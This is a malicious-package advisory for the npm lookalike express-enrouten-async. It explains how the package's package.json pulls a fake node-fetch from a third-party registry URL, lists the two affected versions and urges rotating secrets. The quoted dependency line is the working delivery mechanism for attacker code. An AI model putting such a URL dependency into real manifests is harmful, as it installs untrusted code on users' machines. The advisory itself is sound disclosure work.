npm · Malicious package advisory
Malwareexpress-enrouten-async
MAL-2026-4556
Malicious code in express-enrouten-async (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (f944bc544f9368e58a223e76e462ddec4ba325c728a233100182706ad8f0ae0e) Package name mimics the legitimate `express-enrouten` route-discovery library, but the shipped `index.js` only hardcodes two demo routes rather than implementing automatic route discovery. The malicious mechanism is in `package.json`, which declares `"node-fetch": "https://registry.ctzbg.com/express-enrouten-async/node-fetch"` — a direct URL dependency pointing at a third-party, non-npm registry under a path namespaced to this package. On `npm install`, npm fetches and installs whatever tarball that URL serves as the installer's `node-fetch`, so any code requiring `node-fetch` in the host application loads attacker-controlled, unpinned, mutable bytes from a non-publisher domain. This is dependency-confusion-style supply-chain attack: the lookalike package name lures the install, and the URL-pinned fake `node-fetch` is the delivery vehicle for arbitrary code into the installer's dependency tree.
Compromised versions (2)
- 1.4.12
- 1.4.11
Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.